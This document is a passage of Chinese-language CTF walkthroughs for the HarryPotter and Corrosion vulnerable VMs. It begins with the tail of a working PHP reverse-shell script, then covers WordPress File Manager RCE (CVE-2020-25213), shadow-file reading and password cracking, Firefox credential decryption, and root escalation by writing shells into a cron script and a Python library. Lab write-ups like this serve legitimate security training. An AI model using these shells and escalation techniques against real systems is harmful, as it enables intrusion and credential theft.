   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is end down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?> 

nc 监听,并访问 shell.php 页面 /joomla/templates/protostar/shell.php

image.png

顺便升级成交互式shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

找到了本靶机第一个魂器:

image.png

image.png

提权

/home目录下查看有两个用户,在/home/hermoine发现了第二个魂器,但是没有权限;在/home/snape目录下发现了.creds.txt,解码一下应该是密码

image.pngimage.png

ssh链接测试一下,发现确实

image.png

再次尝试 horcrux2.txt 还是没权限,但发现 /home/hermoine/bin 下有个具有 suid 权限的 su_cp 的二进制文件:

image.png

功能就是复制粘贴。那可以自己生成ssh密钥,复制到 hermoine 用户中,首先先制作 ssh 密钥:

ssh-keygen -f /home/kali/桌面/123

cp 123.pub authorized_keys

image.png

上传到靶机:

scp kali@192.168.93.131:/home/kali/桌面/authorized_keys /tmp

然后使用 su_cp 将 /tmp/authorized_keys 密钥复制到 /home/hermoine/.ssh/authorized_keys

image.png

然后我们就能ssh登录 hermoine 用户:

image.png

现在就能cat第二个魂器了:

image.png

image.png

再提权

linpeas.sh 等工具跑了一遍也没发现什么,然后发现在 /home/hermoine/ 下有个 .mozilla 目录:

image.png

这个地方学到了另外一个靶机之间传递文件的好方法

python3 -m http.server
#wget x.x.x.x:8000/文件名 /指定目录

image.png

使用 firefox_decrypt 工具进行解密:

image.png

image.png

发现了 root 的密码,切换到 root 用户:

image.png

image.png

image.png

HARRYPOTTER : ARAGOG

修复靶机IP问题

不知道为什么每次Debian的靶机IP都出问题,在这先修复一下

image.png

将图中ro修改成rw signie init=/bin/bash

修改完成后按Ctrl+x键进入bash

先查看当前网卡信息ip a命令

image.png

查看网卡配置文件vi /etc/network/interfaces

image.png

可以看到当前网卡内网卡的名称与实际靶机网卡名称不匹配,看到这里我们就知道是什么原因导致的了。将网卡名称修改为正确的名称,保存退出。

/etc/init.d/networking restart

执行ip a 重新查看

image.png

靶机描述

Aragog is the 1st VM of 3-box HarryPotter VM series in which you need to find 2 horcruxes hidden inside the machine (total 8 horcruxes hidden across 3 VMs of the HarryPotter Series) and ultimately defeat Voldemort.

Aragog 是 3 盒 HarryPotter VM 系列中的第一个 VM,您需要在其中找到隐藏在机器内的 2 个魂器(哈利波特系列的 3 个 VM 中总共隐藏了 8 个魂器)并最终击败 Voldemort。

信息搜集

目标确认

攻击机kali IP:192.168.93.131

靶机 Debian IP:192.168.93.136

靶机信息搜集

image.png

22端口 & 80端口

image.png

目录扫描

image.png

有一个/blog,看一下,很明显wordpress

image.png

image.png

发现域名 wordpress.aragog.hogwarts/etc/hosts 文件中添加再访问:

image.png

WordPress有专门的漏扫工具WPScan

image.png

但是。。。WPScan现在必须带上--api-token=才能正常扫描漏洞,VPN坏了翻不了墙申请不了token。。。

先借用人家的:

image.png

发现有个远程代码执行漏洞,CVE-2020-25213。

漏洞利用

下载poc

wget https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py

cat出来看一下用法

image.png

  1. apt-get 安装 python3-requests
  2. 写一个文件名为payload.php 的反弹shell的文件
  3. python3 2020-wp-file-manager-v67.py http://wordpress.aragog.hogwarts/blog/

Kali自带php反弹shell的脚本,我们把它复制到当前文件夹下,并改名为payload.php

image.png

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.93.131';
$port = 2333;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id;sh -i';
$daemon = 0;
$debug = 0;

image.png

image.png

提权

进入系统后,首先我查看了 /home 目录,在 hagrid98 用户下发现了 horcrux1.txt:

image.png

这个一看应该就是base64了吧

image.png

之后我想找一下 wordpress 的配置文件,找一下数据库的用户名密码,查看数据库中有没有可利用信息,wordpress 的配置文件默认命名为 wp-config.php ,find 查找一下:

image.png

查看/etc/wordpress/config-default.php

image.png

登录数据库,首先得获取一个tty shell,不然看不到mysql的输出

python -c 'import pty; pty.spawn("/bin/sh")'

image.png

image.png

找到 hagrid98 用户的密码hash。尝试解密:

image.png

可以去cmd5查一下,也可以去john爆破

image.png

然后我们就能切换用户 hagrid98 用户。

image.png

发现root执行了个 .backup.sh 脚本,既然 root 运行这个脚本,那就写入一个反弹 shell:

image.png

image.png

直接得到了root权限,查看horcrux2.txt

image.png

image.png

提权方法2

有一个辅助提权工具https://github.com/Cerbersec/scripts.git

首先在kali上下好linpeas,在靶机ssh终端下把它复制到/tmp文件夹下

scp kali@192.168.93.131:/home/kali/scripts/linux/linpeas.sh /tmp

image.png

chmod +x ./linpeas.sh
./linpeas.sh

image.png

这里找到一个backup.sh。这个脚本负责复制这个uploads到tmp里面。属于那种隔段时间就会执行的脚本。

用同样的方法下载pspy64看一下执行这个脚本的用户。

chmod +x ./pspy64
./pspy64

image.png

剩下的就和第一个方法相同了。

CORROSION : 2

靶机描述

Difficulty: Medium

Hint: Enumeration is key.

信息搜集

确认目标

攻击机kali IP:192.168.93.131

靶机IP:192.168.93.135

image.png

靶机信息搜集

image.png

目录扫描

image.png

80端口下没有什么有价值的信息。

8080是Apache Tomcat/9.0.53

image.png

image.png

东西不少,看一下:

readme.txt

image.png

嘿 randy!我是你的系统管理员。我在你的服务器上留下了一个文件,我保证没人能找到它。

要记得使用我留给你的密码。

/backup.zip

image.png

攻击开始

登录信息

需要密码?那就爆破一下

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip

image.png

很幸运在tomcat-users.xml中就能找到登录信息

image.png

但是。。。Tomcat不让登录。。。

image.png

Msfconsole利用

msf 上有个 Tomcat 上传webshell的模块,有用户名和密码就可以使用:

image.png

选择载荷,设定信息:

image.png

一发入魂,直接打通:

image.png

输入 shell 后就获得了 Tomcat 用户,查看一下系统文件,发现/home目录下有一些信息

image.png

note.txt 文件里说更改了 randy 对主目录的权限,不能进行删除和添加。

尝试切换用户jaye,密码还是 Tomcat 密码,如果不方便的话,可以用ssh连接登录

image.png

发现一些文件,查看一下,发现 Files 文件夹下有个 look 文件:

image.png

  • 系统look命令:It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.

    它从文件中读取数据,它可用于进行特权读取或在受限文件系统之外公开文件。

用法:

LFILE=file_to_read
./look '' "$LFILE"

image.png

利用这种方法,可以获取到/etc/shadow,把文件复制下来保存,/etc/passwd也可以在MSF中拿到。

image.png

使用 unshadow 命令生成需要破解的密码:

unshadow passwd shadow > pass.txt

利用john进行破解

john --wordlist=/usr/share/wordlists/rockyou.txt ./pass.txt

image.png

image.png

爆破了好几个小时,爆出来两个用户:

  • melehifokivai (jaye)
  • 07051986randy (randy)

第一个是已知的,登录下第二个:

image.png

提权

image.png

发现不能更改该文件,但是他会用python程序运行,我们直接在python程序 base64 模块里面写入shell,先找到python中的base64脚本:

image.png

发现有权限修改,那我们直接写入shell,vim用不了,用的nano编辑器:

image.png

image.png

因为我改的是 python3.8 ,所以要指明 python3.8 运行 randombase64.py 脚本:

image.png

获得了root权限,查看flag:

image.png